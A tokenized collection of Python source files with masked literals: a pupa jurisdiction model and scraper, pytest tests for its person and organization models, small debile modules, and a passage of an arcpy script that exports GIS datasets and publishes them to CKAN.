<s> from . base import BaseModel , Scraper <EOL> from . schemas . jurisdiction import schema <EOL> from . popolo import Organization <EOL> class Jurisdiction ( BaseModel ) : <EOL> """<STR_LIT>""" <EOL> _type = '<STR_LIT>' <EOL> _schema = schema <EOL> classification = None <EOL> name = None <EOL> url = None <EOL> legislative_sessions = [ ] <EOL> feature_flags = [ ] <EOL> extras = { } <EOL> scrapers = { } <EOL> default_scrapers = { } <EOL> parties = [ ] <EOL> ignored_scraped_sessions = [ ] <EOL> check_sessions = False <EOL> def __init__ ( self ) : <EOL> super ( BaseModel , self ) . __init__ ( ) <EOL> self . _related = [ ] <EOL> self . extras = { } <EOL> @ property <EOL> def jurisdiction_id ( self ) : <EOL> return '<STR_LIT>' . format ( self . division_id . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . classification ) <EOL> _id = jurisdiction_id <EOL> def as_dict ( self ) : <EOL> return { '<STR_LIT>' : self . jurisdiction_id , '<STR_LIT:id>' : self . jurisdiction_id , <EOL> '<STR_LIT:name>' : self . name , '<STR_LIT:url>' : self . url , '<STR_LIT>' : self . division_id , <EOL> '<STR_LIT>' : self . classification , <EOL> '<STR_LIT>' : self . legislative_sessions , <EOL> '<STR_LIT>' : self . feature_flags , '<STR_LIT>' : self . extras , } <EOL> def get_session_list ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> def get_organizations ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class JurisdictionScraper ( Scraper ) : <EOL> def scrape ( self ) : <EOL> yield self . jurisdiction <EOL> for org in self . jurisdiction . get_organizations ( ) : <EOL> yield org <EOL> for party in self . jurisdiction . parties : <EOL> org = Organization ( classification = '<STR_LIT>' , name = party [ '<STR_LIT:name>' ] ) <EOL> yield org </s>
<s> import pytest <EOL> from pupa . scrape import Person , Organization , Membership , Post <EOL> from pupa . utils import get_pseudo_id <EOL> from validictory import ValidationError <EOL> import datetime <EOL> def test_basic_post ( ) : <EOL> post = Post ( label = '<STR_LIT:1>' , role = '<STR_LIT>' , organization_id = '<STR_LIT>' ) <EOL> assert '<STR_LIT:1>' in str ( post ) <EOL> post . validate ( ) <EOL> def test_basic_invalid_post ( ) : <EOL> post = Post ( label = <NUM_LIT:1> , role = '<STR_LIT>' , organization_id = '<STR_LIT>' ) <EOL> with pytest . raises ( ValueError ) : <EOL> post . validate ( ) <EOL> def test_basic_membership ( ) : <EOL> m = Membership ( person_id = '<STR_LIT>' , organization_id = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in str ( m ) and '<STR_LIT>' in str ( m ) <EOL> def test_basic_invalid_membership ( ) : <EOL> membership = Membership ( person_id = <NUM_LIT> , organization_id = "<STR_LIT>" ) <EOL> with pytest . raises ( ValueError ) : <EOL> membership . validate ( ) <EOL> def test_basic_invalid_person ( ) : <EOL> bob = Person ( "<STR_LIT>" ) <EOL> bob . add_source ( url = '<STR_LIT:foo>' ) <EOL> bob . validate ( ) <EOL> bob . name = None <EOL> with pytest . raises ( ValidationError ) : <EOL> bob . validate ( ) <EOL> def test_basic_person ( ) : <EOL> p = Person ( '<STR_LIT>' ) <EOL> p . add_source ( '<STR_LIT>' ) <EOL> assert p . name in str ( p ) <EOL> p . validate ( ) <EOL> def test_person_add_membership_org ( ) : <EOL> p = Person ( '<STR_LIT>' ) <EOL> p . add_source ( '<STR_LIT>' ) <EOL> o = Organization ( '<STR_LIT>' , classification = '<STR_LIT>' ) <EOL> p . add_membership ( o , role = '<STR_LIT>' , start_date = '<STR_LIT>' , end_date = datetime . date ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT:8> ) ) <EOL> assert len ( p . _related ) == <NUM_LIT:1> <EOL> p . _related [ <NUM_LIT:0> ] . validate ( ) <EOL> assert p . _related [ <NUM_LIT:0> ] . person_id == p . _id <EOL> assert p . _related [ <NUM_LIT:0> ] . organization_id == o . _id <EOL> assert p . _related [ <NUM_LIT:0> ] . start_date == '<STR_LIT>' <EOL> assert p . _related [ <NUM_LIT:0> ] . end_date == datetime . date ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT:8> ) <EOL> def test_basic_organization ( ) : <EOL> org = Organization ( '<STR_LIT>' , classification = '<STR_LIT>' ) <EOL> org . add_source ( '<STR_LIT>' ) <EOL> assert org . name in str ( org ) <EOL> org . validate ( ) <EOL> def test_no_source_on_party_org ( ) : <EOL> org = Organization ( '<STR_LIT>' , classification = '<STR_LIT>' ) <EOL> org . validate ( ) <EOL> def test_basic_invalid_organization ( ) : <EOL> orga = Organization ( "<STR_LIT:name>" ) <EOL> with pytest . raises ( ValidationError ) : <EOL> orga . validate ( ) <EOL> def test_org_add_post ( ) : <EOL> """<STR_LIT>""" <EOL> orga = Organization ( "<STR_LIT:name>" , classification = "<STR_LIT>" ) <EOL> orga . add_source ( url = '<STR_LIT:foo>' ) <EOL> orga . validate ( ) <EOL> orga . add_post ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert orga . _related [ <NUM_LIT:0> ] . role == "<STR_LIT>" <EOL> assert orga . _related [ <NUM_LIT:0> ] . label == "<STR_LIT>" <EOL> def test_legislator_related_district ( ) : <EOL> l = Person ( '<STR_LIT>' , district = '<STR_LIT:1>' , primary_org = '<STR_LIT>' ) <EOL> l . pre_save ( '<STR_LIT>' ) <EOL> assert len ( l . _related ) == <NUM_LIT:1> <EOL> assert l . _related [ <NUM_LIT:0> ] . person_id == l . _id <EOL> assert get_pseudo_id ( l . _related [ <NUM_LIT:0> ] . organization_id ) == { '<STR_LIT>' : '<STR_LIT>' } <EOL> assert get_pseudo_id ( l . _related [ <NUM_LIT:0> ] . post_id ) == { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : "<STR_LIT:1>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> assert l . _related [ <NUM_LIT:0> ] . role == '<STR_LIT>' <EOL> def test_legislator_related_chamber_district ( ) : <EOL> l = Person ( '<STR_LIT>' , district = '<STR_LIT:1>' , primary_org = '<STR_LIT>' ) <EOL> l . pre_save ( '<STR_LIT>' ) <EOL> assert len ( l . _related ) == <NUM_LIT:1> <EOL> assert l . _related [ <NUM_LIT:0> ] . person_id == l . _id <EOL> assert get_pseudo_id ( l . _related [ <NUM_LIT:0> ] . organization_id ) == { '<STR_LIT>' : '<STR_LIT>' } <EOL> assert get_pseudo_id ( l . _related [ <NUM_LIT:0> ] . post_id ) == { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : "<STR_LIT:1>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> assert l . _related [ <NUM_LIT:0> ] . role == '<STR_LIT>' <EOL> def test_legislator_related_party ( ) : <EOL> l = Person ( '<STR_LIT>' , party = '<STR_LIT>' ) <EOL> l . pre_save ( '<STR_LIT>' ) <EOL> assert len ( l . _related ) == <NUM_LIT:1> <EOL> assert l . _related [ <NUM_LIT:0> ] . person_id == l . _id <EOL> assert get_pseudo_id ( l . _related [ <NUM_LIT:0> ] . organization_id ) == { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' } <EOL> assert l . _related [ <NUM_LIT:0> ] . role == '<STR_LIT>' <EOL> def test_committee_add_member_person ( ) : <EOL> c = Organization ( '<STR_LIT>' , classification = '<STR_LIT>' ) <EOL> p = Person ( '<STR_LIT>' ) <EOL> c . add_member ( p , role = '<STR_LIT>' ) <EOL> assert c . _related [ <NUM_LIT:0> ] . person_id == p . _id <EOL> assert c . _related [ <NUM_LIT:0> ] . organization_id == c . _id <EOL> assert c . _related [ <NUM_LIT:0> ] . role == '<STR_LIT>' <EOL> def test_committee_add_member_name ( ) : <EOL> c = Organization ( '<STR_LIT>' , classification = '<STR_LIT>' ) <EOL> c . add_member ( '<STR_LIT>' ) <EOL> assert get_pseudo_id ( c . _related [ <NUM_LIT:0> ] . person_id ) == { '<STR_LIT:name>' : '<STR_LIT>' } <EOL> assert c . _related [ <NUM_LIT:0> ] . organization_id == c . _id <EOL> assert c . _related [ <NUM_LIT:0> ] . role == '<STR_LIT>' <EOL> def test_person_add_membership_name ( ) : <EOL> p = Person ( '<STR_LIT>' ) <EOL> p . add_membership ( '<STR_LIT>' , role = '<STR_LIT>' , start_date = '<STR_LIT>' ) <EOL> p . _related [ <NUM_LIT:0> ] . validate ( ) <EOL> assert get_pseudo_id ( p . _related [ <NUM_LIT:0> ] . organization_id ) == { '<STR_LIT:name>' : '<STR_LIT>' } <EOL> assert p . _related [ <NUM_LIT:0> ] . person_id == p . _id <EOL> assert p . _related [ <NUM_LIT:0> ] . role == '<STR_LIT>' <EOL> assert p . _related [ <NUM_LIT:0> ] . start_date == '<STR_LIT>' </s>
<s> from debile . slave . runners . jshint import jshint , version <EOL> def run ( dsc , package , job , firehose ) : <EOL> return jshint ( dsc , firehose ) <EOL> def get_version ( ) : <EOL> return version ( ) </s>
<s> class DebileException ( Exception ) : <EOL> pass <EOL> class WrongUserException ( DebileException ) : <EOL> pass <EOL> class GpgImportException ( DebileException ) : <EOL> pass </s>
<s> import sys , os , arcpy , logging , logging . config , shutil , zipfile , glob , ckanclient , datetime , argparse , csv , re <EOL> import xml . etree . ElementTree as et <EOL> args = None <EOL> logger = None <EOL> output_folder = None <EOL> source_feature_class = None <EOL> staging_feature_class = None <EOL> ckan_client = None <EOL> temp_workspace = None <EOL> available_formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> outCoordSystem = "<STR_LIT>" <EOL> geographicTransformation = '<STR_LIT>' <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> global args , output_folder , source_feature_class , staging_feature_class , temp_workspace , logger <EOL> parser = argparse . ArgumentParser ( fromfile_prefix_chars = '<STR_LIT:@>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> required = True , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> required = True , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:none>' ] , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT:all>' ] , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:all>' ] , <EOL> default = '<STR_LIT:all>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> if args . output_folder != None : <EOL> output_folder = args . output_folder . strip ( ) <EOL> if args . temp_workspace != None : <EOL> temp_workspace = args . temp_workspace . strip ( ) <EOL> if args . source_workspace == None : <EOL> source_feature_class = args . feature_class <EOL> else : <EOL> source_feature_class = os . path . join ( args . source_workspace , args . feature_class ) <EOL> if args . formats == None : <EOL> args . formats = available_formats <EOL> else : <EOL> args . formats = args . formats . split ( '<STR_LIT:U+002C>' ) <EOL> for arg in args . formats : <EOL> if not arg in available_formats : <EOL> raise Exception ( str . format ( "<STR_LIT>" , arg ) ) <EOL> init_logger ( ) <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' . format ( os . getcwd ( ) ) ) <EOL> logger . info ( '<STR_LIT>' . format ( source_feature_class ) ) <EOL> logger . info ( '<STR_LIT>' . format ( args . dataset_name ) ) <EOL> logger . info ( '<STR_LIT>' . format ( output_folder ) ) <EOL> logger . info ( '<STR_LIT>' . format ( args . exe_result ) ) <EOL> logger . info ( '<STR_LIT>' . format ( str ( args . formats ) ) ) <EOL> delete_dataset_temp_folder ( ) <EOL> output_folder = create_dataset_folder ( ) <EOL> temp_workspace = create_dataset_temp_folder ( ) <EOL> if args . exe_result != '<STR_LIT>' : <EOL> arcpy . env . outputCoordinateSystem = outCoordSystem <EOL> arcpy . env . geographicTransformations = geographicTransformation <EOL> if ( len ( args . formats ) > <NUM_LIT:0> ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> staging_feature_class = export_file_geodatabase ( ) <EOL> drop_exclude_fields ( ) <EOL> export_metadata ( ) <EOL> if '<STR_LIT>' in args . formats : <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> export_shapefile ( ) <EOL> except : <EOL> if logger : <EOL> logger . exception ( '<STR_LIT>' . format ( args . dataset_name , sys . exc_info ( ) [ <NUM_LIT:1> ] , sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> if '<STR_LIT>' in args . formats : <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> publish_metadata ( ) <EOL> except : <EOL> if logger : <EOL> logger . exception ( '<STR_LIT>' . format ( args . dataset_name , sys . exc_info ( ) [ <NUM_LIT:1> ] , sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> if '<STR_LIT>' in args . formats : <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> publish_file_geodatabase ( ) <EOL> except : <EOL> if logger : <EOL> logger . exception ( '<STR_LIT>' . format ( args . dataset_name , sys . exc_info ( ) [ <NUM_LIT:1> ] , sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> if '<STR_LIT>' in args . formats : <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> export_cad ( ) <EOL> except : <EOL> if logger : <EOL> logger . exception ( '<STR_LIT>' . format ( args . dataset_name , sys . exc_info ( ) [ <NUM_LIT:1> ] , sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> if '<STR_LIT>' in args . formats : <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> export_kml ( ) <EOL> except : <EOL> if logger : <EOL> logger . exception ( '<STR_LIT>' . format ( args . dataset_name , sys . exc_info ( ) [ <NUM_LIT:1> ] , sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> if '<STR_LIT>' in args . formats : <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> export_csv ( ) <EOL> except : <EOL> if logger : <EOL> logger . exception ( '<STR_LIT>' . format ( args . dataset_name , sys . exc_info ( ) [ <NUM_LIT:1> ] , sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> if args . exe_result != '<STR_LIT>' : <EOL> remove_missing_formats_from_publication ( output_folder ) <EOL> if len ( args . formats ) > <NUM_LIT:0> : <EOL> publish_to_ckan ( ) <EOL> logger . info ( '<STR_LIT>' + args . dataset_name ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> except : <EOL> if logger : <EOL> logger . exception ( '<STR_LIT>' . format ( args . dataset_name , sys . exc_info ( ) [ <NUM_LIT:1> ] , sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def publish_to_ckan ( ) : <EOL> """<STR_LIT>""" <EOL> global ckan_client <EOL> ckan_client = ckanclient . CkanClient ( base_location = args . ckan_api , api_key = args . ckan_api_key ) <EOL> dataset_id = args . ckan_dataset_name_prefix + args . dataset_name <EOL> dataset_entity = get_remote_dataset ( dataset_id ) <EOL> if dataset_entity is None : <EOL> create_dataset ( dataset_id ) <EOL> else : <EOL> update_dataset ( dataset_entity ) <EOL> if args . increment != '<STR_LIT:none>' : <EOL> update_dataset_version ( ) <EOL> def remove_missing_formats_from_publication ( directory ) : <EOL> """<STR_LIT>""" <EOL> formats = [ ] <EOL> for exp_format in args . formats : <EOL> logger . debug ( '<STR_LIT>' . format ( exp_format ) ) <EOL> exp_dir = None <EOL> if exp_format == '<STR_LIT>' : <EOL> exp_dir = '<STR_LIT>' <EOL> elif exp_format == '<STR_LIT>' : <EOL> exp_dir = '<STR_LIT>' <EOL> else : <EOL> exp_dir = exp_format <EOL> exp_dir = os . path . join ( directory , exp_dir ) <EOL> if os . path . exists ( exp_dir ) : <EOL> formats . append ( exp_format ) <EOL> args . formats = formats <EOL> def create_folder ( directory , delete = False ) : <EOL> """<STR_LIT>""" <EOL> if os . path . exists ( directory ) and delete : <EOL> logger . debug ( '<STR_LIT>' + directory ) <EOL> shutil . rmtree ( directory ) <EOL> if not os . path . exists ( directory ) : <EOL> logger . debug ( '<STR_LIT>' + directory + '<STR_LIT>' ) <EOL> os . makedirs ( directory ) <EOL> return directory <EOL> def create_dataset_folder ( ) : <EOL> """<STR_LIT>""" <EOL> directory = os . path . join ( output_folder , get_dataset_filename ( ) ) <EOL> create_folder ( directory ) <EOL> return directory <EOL> def create_dataset_temp_folder ( ) : <EOL> """<STR_LIT>""" <EOL> global temp_workspace <EOL> directory = os . path . join ( temp_workspace , get_dataset_filename ( ) ) <EOL> create_folder ( directory ) <EOL> return directory <EOL> def delete_dataset_temp_folder ( ) : <EOL> """<STR_LIT>""" <EOL> global temp_workspace <EOL> name = get_dataset_filename ( ) <EOL> gdb_folder = os . path . join ( temp_workspace , '<STR_LIT>' ) <EOL> gdb_file = os . path . join ( gdb_folder , name + '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' + gdb_file ) <EOL> if os . path . exists ( gdb_file ) : <EOL> arcpy . Delete_management ( gdb_file ) <EOL> dataset_directory = os . path . join ( temp_workspace , name ) <EOL> if os . path . exists ( dataset_directory ) : <EOL> logger . debug ( '<STR_LIT>' + dataset_directory ) <EOL> shutil . rmtree ( dataset_directory ) <EOL> def publish_file ( directory , file_name , file_type ) : <EOL> """<STR_LIT>""" <EOL> folder = create_folder ( os . path . join ( output_folder , file_type ) ) <EOL> logger . info ( '<STR_LIT>' + file_name + '<STR_LIT>' + folder ) <EOL> shutil . copyfile ( os . path . join ( directory , file_name ) , os . path . join ( folder , file_name ) ) <EOL> def get_dataset_filename ( ) : <EOL> """<STR_LIT>""" <EOL> global args <EOL> return args . dataset_name . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> def get_dataset_title ( ) : <EOL> """<STR_LIT>""" <EOL> global args <EOL> return args . ckan_dataset_title_prefix + '<STR_LIT>' + args . dataset_title <EOL> def export_file_geodatabase ( ) : <EOL> """<STR_LIT>""" <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> temp_working_folder = os . path . join ( temp_workspace , folder ) <EOL> create_folder ( temp_working_folder , True ) <EOL> gdb_temp = os . path . join ( temp_working_folder , name + '<STR_LIT>' ) <EOL> gdb_feature_class = os . path . join ( gdb_temp , name ) <EOL> if not arcpy . Exists ( gdb_temp ) : <EOL> logger . debug ( '<STR_LIT>' + args . gdb_version + '<STR_LIT>' + gdb_temp ) <EOL> arcpy . CreateFileGDB_management ( os . path . dirname ( gdb_temp ) , os . path . basename ( gdb_temp ) , args . gdb_version ) <EOL> logger . debug ( '<STR_LIT>' + source_feature_class ) <EOL> logger . debug ( '<STR_LIT>' + gdb_feature_class ) <EOL> arcpy . CopyFeatures_management ( source_feature_class , gdb_feature_class ) <EOL> return gdb_feature_class <EOL> def publish_file_geodatabase ( ) : <EOL> """<STR_LIT>""" <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> temp_working_folder = os . path . join ( temp_workspace , folder ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> zip_file_name = os . path . join ( temp_working_folder , name + '<STR_LIT>' ) <EOL> zip_file = zipfile . ZipFile ( zip_file_name , '<STR_LIT:w>' ) <EOL> gdb_file_name = os . path . join ( temp_working_folder , name + '<STR_LIT>' ) <EOL> for filename in glob . glob ( gdb_file_name + '<STR_LIT>' ) : <EOL> if ( not filename . endswith ( '<STR_LIT>' ) ) : <EOL> zip_file . write ( filename , name + '<STR_LIT>' + os . path . basename ( filename ) , zipfile . ZIP_DEFLATED ) <EOL> zip_file . close ( ) <EOL> publish_file ( temp_working_folder , name + '<STR_LIT>' , '<STR_LIT>' ) <EOL> def export_shapefile ( ) : <EOL> """<STR_LIT>""" <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> temp_working_folder = os . path . join ( temp_workspace , folder ) <EOL> create_folder ( temp_working_folder , True ) <EOL> zip_folder = os . path . join ( temp_working_folder , name ) <EOL> create_folder ( zip_folder ) <EOL> source = staging_feature_class <EOL> destination = os . path . join ( zip_folder , name + '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' + source + '<STR_LIT>' + destination + '<STR_LIT:">' ) <EOL> arcpy . CopyFeatures_management ( source , destination , '<STR_LIT>' , '<STR_LIT:0>' , '<STR_LIT:0>' , '<STR_LIT:0>' ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> zip_file = zipfile . ZipFile ( os . path . join ( temp_working_folder , name + '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> for filename in glob . glob ( zip_folder + '<STR_LIT>' ) : <EOL> zip_file . write ( filename , os . path . basename ( filename ) , zipfile . ZIP_DEFLATED ) <EOL> zip_file . close ( ) <EOL> publish_file ( temp_working_folder , name + '<STR_LIT>' , '<STR_LIT>' ) <EOL> def export_cad ( ) : <EOL> """<STR_LIT>""" <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> temp_working_folder = os . path . join ( temp_workspace , folder ) <EOL> create_folder ( temp_working_folder , True ) <EOL> source = staging_feature_class <EOL> destination = os . path . join ( temp_working_folder , name + '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' + source + '<STR_LIT>' + destination + '<STR_LIT:">' ) <EOL> arcpy . ExportCAD_conversion ( source , '<STR_LIT>' , destination , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> publish_file ( temp_working_folder , name + '<STR_LIT>' , '<STR_LIT>' ) <EOL> def export_kml ( ) : <EOL> """<STR_LIT>""" <EOL> arcpy . CheckOutExtension ( '<STR_LIT>' ) <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> temp_working_folder = os . path . join ( temp_workspace , folder ) <EOL> create_folder ( temp_working_folder , True ) <EOL> destination = os . path . join ( temp_working_folder , name + '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' + staging_feature_class + '<STR_LIT:">' ) <EOL> arcpy . MakeFeatureLayer_management ( staging_feature_class , name , '<STR_LIT>' , '<STR_LIT>' ) <EOL> replace_literal_nulls ( name ) <EOL> logger . debug ( '<STR_LIT>' + destination + '<STR_LIT:">' ) <EOL> arcpy . LayerToKML_conversion ( name , destination , '<STR_LIT>' , '<STR_LIT:false>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' + name ) <EOL> arcpy . Delete_management ( name ) <EOL> publish_file ( temp_working_folder , name + '<STR_LIT>' , '<STR_LIT>' ) <EOL> def export_metadata ( ) : <EOL> """<STR_LIT>""" <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> temp_working_folder = os . path . join ( temp_workspace , folder ) <EOL> create_folder ( temp_working_folder , True ) <EOL> source = staging_feature_class <EOL> raw_metadata_export = os . path . join ( temp_working_folder , name + '<STR_LIT>' ) <EOL> arcpy . env . workspace = temp_working_folder <EOL> installDir = arcpy . GetInstallInfo ( '<STR_LIT>' ) [ '<STR_LIT>' ] <EOL> translator = installDir + '<STR_LIT>' <EOL> arcpy . ExportMetadata_conversion ( source , translator , raw_metadata_export ) <EOL> destination = os . path . join ( temp_working_folder , name + '<STR_LIT>' ) <EOL> if os . path . exists ( args . metadata_xslt ) : <EOL> logger . info ( '<STR_LIT>' + args . metadata_xslt ) <EOL> arcpy . XSLTransform_conversion ( raw_metadata_export , args . metadata_xslt , destination , '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' + destination ) <EOL> arcpy . MetadataImporter_conversion ( destination , staging_feature_class ) <EOL> else : <EOL> logger . warn ( '<STR_LIT>' . format ( args . dataset_name ) ) <EOL> os . rename ( raw_metadata_export , destination ) <EOL> publish_file ( temp_working_folder , name + '<STR_LIT>' , '<STR_LIT>' ) <EOL> def publish_metadata ( ) : <EOL> """<STR_LIT>""" <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> temp_working_folder = os . path . join ( temp_workspace , folder ) <EOL> publish_file ( temp_working_folder , name + '<STR_LIT>' , '<STR_LIT>' ) <EOL> def export_csv ( ) : <EOL> """<STR_LIT>""" <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> temp_working_folder = os . path . join ( temp_workspace , folder ) <EOL> create_folder ( temp_working_folder , True ) <EOL> source = staging_feature_class <EOL> destination = os . path . join ( temp_working_folder , name + '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' + source + '<STR_LIT>' + destination + '<STR_LIT:">' ) <EOL> rows = arcpy . SearchCursor ( source ) <EOL> csv_file = open ( destination , '<STR_LIT:wb>' ) <EOL> csv_writer = csv . writer ( csv_file ) <EOL> fieldnames = [ f . name for f in arcpy . ListFields ( source ) ] <EOL> if '<STR_LIT>' in fieldnames : <EOL> fieldnames . remove ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in fieldnames : <EOL> fieldnames . remove ( '<STR_LIT>' ) <EOL> csv_writer . writerow ( fieldnames ) <EOL> error_report = '<STR_LIT>' <EOL> error_count = <NUM_LIT:0> <EOL> for row in rows : <EOL> values = [ ] <EOL> for field in 